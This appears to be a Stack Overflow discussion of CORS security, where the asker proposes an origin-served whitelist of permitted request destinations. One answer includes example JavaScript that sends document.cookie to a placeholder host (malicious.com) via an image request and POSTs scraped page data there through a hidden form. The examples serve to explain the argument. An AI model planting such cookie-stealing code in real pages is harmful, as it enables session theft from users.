I was reading about CORS (https://developer.mozilla.org/en/HTTP_access_control) and I think the implementation is both simple and effective.

However, unless I'm missing something, I think there's a big part missing from the spec. As I understand it, it's the foreign site that decides, based on the origin of the request (and optionally including credentials), whether to allow access to its resources. This is fine.
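For concreteness, the exchange looks roughly like this (the URLs here are made up, but the Origin / Access-Control-Allow-Origin headers are the actual CORS mechanism):

    // A page served from https://example.com makes a cross-origin XHR
    var xhr = new XMLHttpRequest();
    xhr.open("GET", "https://api.foreign-site.com/data");  // hypothetical URL
    xhr.onload = function () { console.log(xhr.responseText); };
    xhr.send();

    // The browser automatically adds:  Origin: https://example.com
    // It exposes the response only if the foreign site replies with:
    //   Access-Control-Allow-Origin: https://example.com   (or *)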

But what if malicious code on the page wants to POST a user's sensitive information to a foreign site? The foreign site is obviously going to allow the request. Hence, again unless I'm missing something, CORS actually makes it easier to steal sensitive information.

I think it would have made much more sense if the original site could also supply an immutable list of servers its page is allowed to access.

So the expanded sequence would be:

1. Supply a page with a list of acceptable CORS servers (abc.com, xyz.com, etc.)
2. The page wants to make an XHR request to abc.com - the browser allows this because it is in the allowed list, and authentication proceeds as normal
3. The page wants to make an XHR request to malicious.com - the request is rejected locally (i.e. by the browser) because the server is not in the list
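To illustrate, the original site could serve something like the following - the header name and syntax are entirely made up, this is not part of any existing spec:

    // Hypothetical header served by the *origin* site along with the page:
    //   X-Acceptable-Cors-Servers: abc.com, xyz.com
    //
    // The browser itself would then enforce the list:
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "https://malicious.com/collect");
    xhr.send("secret=...");  // rejected locally - malicious.com is not on the list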

I know that malicious code could still use JSONP to do its dirty work, but I would have thought that a complete implementation of CORS would imply the closing of the script tag multi-site loophole.
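(For reference, the script-tag loophole I mean is just this sort of thing - the endpoint is hypothetical:)

    // A <script> tag is not subject to the same-origin policy, so a page can
    // pull executable code (and, via JSONP, data) from any domain:
    window.handleData = function (data) { /* foreign data is now in the page */ };
    var s = document.createElement("script");
    s.src = "https://some-other-site.example/api?callback=handleData";  // hypothetical endpoint
    document.body.appendChild(s);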

I also checked out the official CORS spec (http://www.w3.org/TR/cors) and could not find any mention of this issue.

A: 

It seems to me that CORS is purely expanding what is possible, and trying to do it securely. I think this is clearly a conservative move. Making the cross-domain policy on other tags (script/img) stricter would be more secure, but it would break a lot of existing code and make the new technology much harder to adopt. Hopefully something will be done to close that security hole eventually, but I think they need to make sure it's an easy transition first.

Russell Leggett
My main point was not so much the closing of the existing loopholes as the fact that there appears (to me at least) to be a big hole in the CORS spec.
David Semeria
+4  A: 

But what if malicious code on the page wants to POST a user's sensitive information to a foreign site?

What about it? You can already do that without CORS. Ever since Netscape 2, you have been able to transfer information to any third-party site through simple GET and POST requests triggered by interfaces as simple as form.submit(), new Image() or setting window.location.
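For example, any of the following works today, with or without CORS (malicious.com standing in for the attacker's server):

    // Leak data in a GET request simply by creating an image:
    new Image().src = "https://malicious.com/log?d=" + encodeURIComponent(document.cookie);

    // Or POST it with a dynamically built form:
    var f = document.createElement("form");
    f.method = "POST";
    f.action = "https://malicious.com/collect";
    var input = document.createElement("input");
    input.type = "hidden";
    input.name = "data";
    input.value = "whatever the injected script scraped from the page";
    f.appendChild(input);
    document.body.appendChild(f);
    f.submit();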

If malicious code has access to sensitive information, you have already totally lost.

3) Page wants to make an XHR request to malicious.com - request rejected locally

Why would a page try to make an XHR request to a site it has not already whitelisted?

If you are trying to protect against the actions of malicious script injected due to XSS vulnerabilities, you are attempting to fix the symptom, not the cause.

bobince
Agreed - but surely it's desirable to make it hard for a compromised page to write information to a non-whitelisted location. I don't see this as treating the symptom rather than the cause. A good bank vault would still try to make it very hard for the robbers to get the money out, even if they did manage to defeat the first level of security and get into the vault in the first place.
David Semeria
An ineffective security measure is worse than no security measure.
bobince
"A good bank vault would still try to make it very hard for the robbers to get the money out, even if they did manage to defeat the first level security"Even the best bank vault wouldn't bother to install, for example, a steel barrier, knowing that the only thing the thief had to do was to walk around the barrier. As bobince stated, once you have an XSS vulnerability, you have already totally lost.
greim
A: 

I share David's concerns. Security must be built layer by layer, and a whitelist served by the origin server seems like a good approach.

Plus, this whitelist could be used to close the existing loopholes (forms, script tags, etc.); it's safe to assume that a server serving such a whitelist has been designed to avoid backward-compatibility issues.

vmiazzo
Unfortunately, the CSRF vulnerability is baked into the fundamental architecture of the web. There's no changing it now. Even if it *could* be changed, it's not clear that it *should* be changed. Yes, there are security concerns, but security isn't the only consideration in the grand scheme of things.
greim